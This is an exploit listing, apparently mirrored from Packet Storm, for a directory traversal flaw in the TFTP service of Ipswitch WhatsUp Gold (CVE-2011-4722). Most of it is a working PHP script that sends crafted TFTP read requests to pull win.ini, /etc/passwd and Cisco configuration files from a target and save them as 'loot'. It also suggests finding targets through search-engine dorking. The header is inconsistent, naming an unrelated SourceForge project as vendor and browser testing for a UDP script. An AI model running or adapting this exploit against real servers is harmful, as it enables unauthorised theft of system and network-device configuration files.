Share
## https://sploitus.com/exploit?id=PACKETSTORM:216783
=============================================================================================================================================
    | # Title     : TFTP Server 1.0.0.24 in Ipswitch WhatsUp Gold Directory Traversal vulnerability                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://sourceforge.net/projects/go-tftp/                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Performing a Directory Traversal attack against the TFTP service of IpSwitch WhatsUp Gold, allowing sensitive files to be exfiltrated from the targeted server.
       
       (Related : https://packetstorm.news/files/id/180941/ Linked CVE numbers: CVE-2011-4722 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 3.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    // إعدادات الاتصال
    $target_ip = "192.168.1.100"; // قم بتغيير هذا إلى عنوان IP الهدف
    $port = 69; // منفذ TFTP الافتراضي
    
    // قائمة الملفات المستهدفة حسب نظام التشغيل
    $target_files = [
        "Windows" => str_repeat("../", 10) . "windows/win.ini",
        "Linux"   => str_repeat("../", 10) . "etc/passwd",
        "MacOS"   => str_repeat("../", 10) . "etc/passwd",
        "Cisco"   => str_repeat("../", 10) . "flash:/config.text",
        "Cisco-NVRAM" => str_repeat("../", 10) . "nvram:startup-config"
    ];
    
    // إنشاء مقبس (Socket) UDP
    $socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if (!$socket) {
        die("خطأ: لا يمكن إنشاء مقبس UDP.\n");
    }
    
    // تكرار الاختبار لكل ملف مستهدف
    foreach ($target_files as $os => $filename) {
        echo "محاولة استرجاع الملف الخاص بـ: $os -> $filename\n";
    
        // إعداد حزمة الطلب (TFTP Read Request)
        $request = "\x00\x01" . $filename . "\x00" . "octet" . "\x00";
    
        // إرسال الطلب إلى الخادم الهدف
        socket_sendto($socket, $request, strlen($request), 0, $target_ip, $port);
    
        // استقبال البيانات من الخادم
        $file_data = "";
        while (true) {
            $buf = "";
            $from = "";
            $port = 0;
            $bytes_received = socket_recvfrom($socket, $buf, 65535, 0, $from, $port);
    
            if ($bytes_received === false || $bytes_received === 0) {
                break; // انتهى النقل أو حدث خطأ
            }
    
            // فك تشفير الحزمة المستقبلة
            $opcode = unpack("n", substr($buf, 0, 2))[1];
            $block_id = unpack("n", substr($buf, 2, 2))[1];
            $data = substr($buf, 4);
    
            if ($opcode !== 3) { // 3 = حزمة بيانات
                echo " فشل استرجاع الملف: $filename من $target_ip\n";
                break;
            }
    
            $file_data .= $data;
    
            // إرسال تأكيد الاستلام (ACK)
            $ack = "\x00\x04" . pack("n", $block_id);
            socket_sendto($socket, $ack, strlen($ack), 0, $from, $port);
    
            // إنهاء النقل إذا كان حجم البيانات أقل من 512 بايت
            if (strlen($data) < 512) {
                break;
            }
        }
    
        // حفظ البيانات في ملف محلي
        if (!empty($file_data)) {
            $local_filename = "loot_" . str_replace(["/", ":", "\\"], "_", $filename);
            file_put_contents($local_filename, $file_data);
            echo " تم حفظ الملف ($os) بنجاح في: $local_filename\n";
        } else {
            echo "️ لم يتم العثور على الملف: $filename\n";
        }
    }
    
    // إغلاق المقبس
    socket_close($socket);
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================